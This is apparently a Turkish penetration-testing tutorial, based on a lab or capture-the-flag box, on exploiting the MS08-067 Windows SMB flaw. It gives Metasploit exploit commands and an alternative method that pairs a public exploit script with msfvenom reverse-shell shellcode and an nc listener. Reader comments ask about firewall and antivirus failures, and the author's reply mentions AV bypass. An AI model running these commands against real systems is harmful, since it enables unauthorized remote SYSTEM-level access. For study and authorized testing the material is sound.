Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS08-067 zafiyetinin tespit edildiği görülmektedir.
Bu zafiyeti istismar etmek için Kali sağıtımı üzerindeki Metasploit Framework kullanılabilir. Bu işlem için öncelikle Kali’deki komut satırından MSF’in komut satırına erişilir.
msfconsole -q
Metasploit üzerinde ilgili modülün (MSF ms08_067_netapi istismar modülü) seçenekleri aşağıdaki gibidir:
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.
set RHOST 192.168.244.138
show options
exploit
Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.
sysinfo
getuid
getpid
ps
Not: MSF yerine Exploit-db içerisindeki Python kodu da kullanılabilirdi.
https://www.exploit-db.com/exploits/7132/
Not: Benzer olarak jivoi tarafından sunulan ms08-067.py isimli Python kodu içerisindeki Shellcode güncellenerek de ters bağlantı elde edilebilir.
- İstismar Betiği: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
- Yeni ShellCode: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=3333 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 –platform windows
- İstismar: python ms08-067.py 10.10.10.9 445
- Dinleyici: nc -lnvp 3333
Bu açıklıkla ilgili ayrıntılı bilgi için Bilgi Güvenliği Kapısı‘nda yayınlanan bağlantıdaki yazı incelenebilir.
Kaynaklar:
https://pentestworld.blogspot.com/2019/05/hack-box-legacy.html
Hocam, güvenlik duvarı bu exploiti engelliyorsa nasıl bir yol izlememiz gerekiyor? Şöyle bir alıyorum; exploit complated but no Session was created.. karşı tarafta lokal olarak çalışan Windows sever 2003 var ve iis 6 olarak hizmet veriyor.
Bir türlü bu exploit çalışmadı. Karşıda Kaspersky antivir calistigim içindir diye düşünüyorum :(
Merhaba
Networksel olarak ilgili porta erişiminiz gerekir. Erişemezseniz istismar edemezsiniz.
Ayrıca istismar edilebilecek zafiyetin de olması gerekir. Zafiyet yamanmış ise, istismar edemezsiniz.
Kullandığınız istismar kodu uygun (OS sürümü, dili, mimarisi vs) olmalıdır.
Eğer AV yakalıyorsa, AV’den kaçınma yollarından (AV bypass) birisini uygulamanız gerekir.